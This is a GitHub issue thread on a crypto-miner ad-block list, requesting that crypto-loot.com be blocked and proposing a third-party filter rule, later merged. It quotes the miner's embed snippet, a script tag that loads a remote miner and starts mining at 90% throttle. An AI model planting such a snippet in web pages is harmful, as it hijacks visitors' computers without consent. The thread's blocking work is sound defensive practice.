### ISSUE TITLE
Add crypto-loot.com

### ISSUE THREAD

**Issue by blueshell1** [hoshsadiq/adblock-nocoin-list#37]
Another miner, similar to coin-hive. Should be added to the block list.

https://crypto-loot.com/

Right now only know of The Pirate Bay using it (e.g. current code in https://thepiratebay.org/browse), maybe there's other sites.

    <script src="https://crypto-loot.com/lib/miner.min.js"></script>
    <script>
    var miner = new CryptoLoot.Anonymous('MONEROADDRESS', { throttle: 0.9 });
    miner.start();
    </script>

**Comment by SMed79** [comment]
I do not see `crypto-loot.com` in the html source of the page https://pastebin.com/BZcjatDf

**Comment by hoshsadiq** [comment]
I was under the impression tpb used coin hive? Anyway, `||crypto-loot.com$third-party` should be good. I will inspect it further when I get home to check if there's any other filters that need to be added.

**Comment by hoshsadiq** [comment]
Merged. Thanks @callmenemo491

**Comment by blueshell1** [comment]
Thanks for the update! Yes crypto-loot.com was live in thepiratebay.org's html code when I originally opened the issue. Seems they moved away from coin-hive.com.

@SMed79 is correct, not seeing that .js code in thepiratebay.org at this moment. Perhaps the reference is now being obfuscated behind other .js scripts, not sure.

crypto-loot.com itself is definitely a miner so it may as well stay in the block list.
